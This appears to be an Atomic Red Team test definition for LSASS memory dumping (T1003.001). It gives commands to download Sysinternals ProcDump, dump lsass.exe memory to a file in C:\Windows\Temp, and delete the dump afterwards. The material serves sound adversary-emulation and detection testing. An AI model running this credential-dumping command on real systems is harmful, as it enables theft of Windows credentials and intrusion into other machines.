#TechniqueName: OS Credential Dumping: LSASS Memory
#AtomicTestName: Dump LSASS.exe Memory using ProcDump
#Description: The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals&ProcDump.&&Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.&&If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the  get-prereq_commands to download and install the ProcDump tool first.&
#Language: cmd

#get_prereq_commands
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
New-Item -ItemType Directory (Split-Path PathToAtomicsFolder\T1003.001\bin\procdump.exe) -Force | Out-Null
Copy-Item $env:TEMP\Procdump\Procdump.exe PathToAtomicsFolder\T1003.001\bin\procdump.exe -Force


#commands
PathToAtomicsFolder\T1003.001\bin\procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmp


#cleanup_commands
del "C:\Windows\Temp\lsass_dump.dmp" >nul 2> nul

